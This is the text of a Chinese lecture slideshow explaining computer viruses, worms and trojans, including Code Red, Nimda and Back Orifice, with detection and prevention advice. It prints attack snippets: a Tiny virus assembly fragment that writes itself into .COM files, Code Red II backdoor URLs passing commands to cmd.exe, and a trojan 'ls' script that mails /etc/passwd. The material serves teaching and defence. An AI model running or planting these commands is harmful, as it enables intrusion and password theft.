计算机病毒蠕虫和特洛伊木马介绍.ppt

《计算机病毒蠕虫和特洛伊木马介绍.ppt》由会员分享，可在线阅读，更多相关《计算机病毒蠕虫和特洛伊木马介绍.ppt（44页珍藏版）》请在金锄头文库上搜索。

1、计算机病毒、蠕虫和特洛伊木马,提纲,计算机病毒 网络蠕虫 特洛伊木马,计算机病毒,病毒结构模型 病毒的分类 引导型病毒 文件型病毒 宏病毒 病毒举例 病毒防范,计算机病毒的结构,传染条件判断,传染代码,表现及破坏条件判断,破坏代码,传染模块,表现模块,计算机病毒的分类,按攻击平台分类：DOS,Win32，MAC，Unix 按危害分类：良性、恶性 按代码形式：源码、中间代码、目标码 按宿主分类： 引导型 主引导区 操作系统引导区 文件型 操作系统 应用程序 宏病毒,引导型病毒引导记录,主引导记录（MBR）,A,引导型病毒系统引导过程,Power On,CPU & ROM BIOS Initial

2、izes,POST Tests,Look for boot device,MBR boot Partition Table Load,DOS Boot Sector Runs,Loads IO.SYS MSDOS.SYS,DOS Loaded,引导型病毒感染与执行过程,系统引导区,引导 正常执行,病毒,引导系统,病毒体,病毒的激活过程,内存空间,空闲区,带病毒程序,int8,int8,int8,int8,int8,int8,int8,int8,int8,int8,int8,int8,空闲区,正常程序,正常程序,正常程序,int8,是,破坏！,int8, ,举例小球病毒（Bouncing Bal

3、l),在磁盘上的存储位置,文件分配表,病毒的第二部分, ,000号扇区,001号扇区,第一个空簇,正常的引导扇区,正常的引导扇区,病毒的第一部分,感染后的系统启动过程,启动,将病毒程序的第一部分送入内存高端,将第二部分装入内存，与第一部分 拼接在一起,读入真正的Boot 区代码， 送到0000:TC00处,修改INT 13 中断向量，指向病毒,转移到 0000:TC00处，开始真正的系统引导,触发条件修改后的INT 13,进入INT 13中断,病毒检测原理,特征匹配 例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C: POP AX JMP F000AF1A PUSHF 行为监控

4、 对中断向量表的修改 对引导记录的修改 对.exe, .com文件的写操作 驻留内存 软件模拟,防范与检测,数据备份 不要用移动介质启动（设置CMOS选项） 设置CMOS的引导记录保护选项 安装补丁，并及时更新 安装防病毒软件，及时更新病毒定义码 限制文件共享 不轻易打开电子邮件的附件 没有病毒处理前不要使用其他移动介质 不要运行不可信的程序 移动介质写保护,文件型病毒文件结构,.COM文件 .EXE 文件,PSP Header (256 bytes),Code, Data, Stack Segment(s) (64K Bytes),代码、数据、堆栈在通一段中 在内存中的.COM是磁盘文件的镜

5、像,PSP Header (512 bytes),Code Segment(s) (64K ),Data Segment(s) (64K ),Stack Segment(s) (64K ),其他可执行的文件类型,.BAT .PIF .SYS .DRV .OVR .OVL .DLL .VxD,正常 程序,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,病毒程序头,程序头,病毒程序,病毒程序,病毒程序,病毒程序,程序头,文件型病毒感染机理,文件型病毒举例,最简单的病毒Tiny-32(32 bytes) 寻找宿主文件 打

6、开文件 把自己写入文件 关闭文件,MOV AH, 4E ;setup to find a file INT 21 ;find the host file MOV AX, 3D02 ;setup to open the host file INT 21 ;open host file MOV AH, 40 ;setup to write file to disk INT 21 ;write to file DB *.COM ;what files to look for,宏病毒（Macro Virus）,历史： 1980年，Dr. Fredrick Cohen and Ralf Burger 论

7、文 1994年，Microsoft Word 第一例宏病毒 Word, Excel, Access, PowerPoint, Project, Lotus AmiPro, Visio, Lotus 1-2-3, AutoCAD, Corel Draw. 使用数据文件进行传播，使得反病毒软件不再只关注可执行文件和引导区 DOE ViRT 统计，85%的病毒感染归因于宏病毒 易于编写，只需要一两天的时间，1015行代码 大量的用户：90 Million MS Office Users 人们通常不交换程序，而交换数据,宏病毒工作机理,有毒文件.doc,Normal.dot,无毒文件.doc,Norm

8、al.dot,注意事项,Macro 可以存在模板里，也可以存在文档里 RTF文件也可以包含宏病毒 通过IE 浏览器可以直接打开，而不提示下载,提纲,计算机病毒 网络蠕虫 特洛伊木马,蠕虫（Worm）,一个独立的计算机程序，不需要宿主 自我复制，自主传播（Mobile） 占用系统或网络资源、破坏其他程序 不伪装成其他程序，靠自主传播 利用系统漏洞； 利用电子邮件（无需用户参与）,莫里斯蠕虫事件,发生于1988年，当时导致大约6000台机器瘫痪 主要的攻击方法 Rsh，rexec：用户的缺省认证 Sendmail 的debug模式 Fingerd的缓冲区溢出 口令猜测,CR I,主要影响Windo

9、ws NT系统和Windows 2000 主要影响国外网络 据CERT统计，至8月初已经感染超过25万台 主要行为 利用IIS 的Index服务的缓冲区溢出缺陷进入系统 检查c:notworm文件是否存在以判断是否感染 中文保护（是中文windows就不修改主页） 攻击白宫！,CR II,Inspired by RC I 影响波及全球 国内影响尤其广泛 主要行为 所利用缺陷相同 只感染windows2000系统，由于一些参数的问题，只会导致NT死机 休眠与扫描：中文windows，600个线程,Nimda 简介,影响系统：MS win9x, wind2k, win XP 传播途径： Email

10、、文件共享、页面浏览、 MS IIS目录遍历、Code Red 后门 影响 群发电子邮件，付病毒 扫描共享文件夹， 扫描有漏洞的IIS, 扫描有Code Red后门的IIS Server,红色代码病毒,红色代码病毒是一种结合了病毒、木马、DDOS机制的蠕虫。 2001年7月中旬，在美国等地大规模蔓延。 2001年8月初，出现变种coderedII，针对中文版windows系统，国内大规模蔓延。 通过80端口传播。 只存在与网络服务器的内存，不通过文件载体。 利用IIS缓冲区溢出漏洞（2001年6月18日发布）,CodeRed I,在侵入一台服务器后，其运行步骤是： 设置运行环境，修改堆栈指针，

11、设置堆栈大小为218h字节。接着使用RVA（相对虚拟地址）查找GetProcAddress的函数地址，然后就获得其他socket、connect、send、recv、closesocket等函数地址； 如果C:notworm在，不再进一步传染； 传染其他主机。创造100个线程，其中99个用户感染其他WEB服务器，被攻击IP通过一个算法计算得出； 篡改主页，如果系统默认语言为“美国英语”，第100个进程就将这台服务的主页改成“Welcome to http:/ !, Hacked By Chinese!”，并持续10个小时。（这个修改直接在内存中修改，而不是修改*.htm文件）； 如果时间在20

12、：00UTC和23：59UTC之间，将反复和白宫主页建立连接，并发送98k字节数据，形成DDOS攻击。,CodeRed II,增加了特洛依木马的功能，并针对中国网站做了改进 计算IP的方法进行了修改，使病毒传染的更快； 检查是否存在CodeRedII原子，若存在则进入睡眠状态防止反复感染，若不存在则创建CodeRedII原子； 创建300个线程进行传染，若系统默认语言为简体中文或繁体中文，则创建600个线程； 检查时间。病毒作者的意图是传播过程在2001年10月1日完成，之后，蠕虫会爆发而使系统不断重新启动。 在系统中安装一个特洛依木马： 拷贝系统目录cmd.exe到IIS的脚本执行目录下，改

13、名为root.exe； 将病毒体内的木马解压缩写到C盘和D盘的explorer.exe 木马每次系统和启动都会运行，禁止系统的文件保护功能，并将C盘和D盘通过web服务器共享,CodeRed II,攻击形式 http:/x.x.x.x/c/inetpub/scripts/root.exe?/c+dir http:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻击的IP地址，dir可以是任意命令，比如删除系统中的文件，向外发送机密数据等，这个后门后来也成为了nimda病毒的一个传播模式。 下面是cert/cc上提供的被攻击服务器日志(CA

14、-2001-11) 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/winnt/system32/cmd.exe /c+dir 200 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/winnt/system32/cmd.exe /c+dir+ 200 ,红色代码病毒的检测和防范,针对安装IIS的windows系统； 是否出现负载显著增加（CPU/网络）的现象； 用netstat an检查是否有许多对外的80端口连接 在web日志中检查是否有/

15、default.ida?xxx%u0078%u0000 u00=a HTTP/1.0这样的攻击记录； 查找系统中是否存在文件c:explorer.exe或d:explorer.exe 以及root.exe； 检查注册表文件中是否增加了C和D虚拟目录，以及文件保护功能是否被禁止。 在任务管理器中检查是否存在两个explorer.exe进程。,提纲,计算机病毒 网络蠕虫 特洛伊木马,特洛伊木马,名字来源：古希腊故事 通过伪装成其他程序、有意隐藏自己恶意行为的程序，通常留下一个远程控制的后门 没有自我复制的功能 非自主传播 用户主动发送给其他人 放到网站上由用户下载,最简单的木马举例,ls #!/b

16、in/sh /bin/mail /etc/passwd ls,PATH=./ :/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin,特洛依木马举例,Back Orifice Cult of the Dead Cow在1998年8月发布, 公开源码软件，遵守GPL，是功能强大的远程控制器木马。 boserver.exe、boconfig.exe、bogui.exe 在BO服务器上启动、停止基于文本的应用程序 目录和文件操作。包括创建、删除、查看目录、查找、解压、压缩。 共享。创建共享资源 HTTP服务。启动或停止HTTP服务。 击键记录。将BO服务器上用户的击键记录在一个文本文件中，同时记录执行输入的窗口名。（可以获得用户口令）,特洛依木马,视频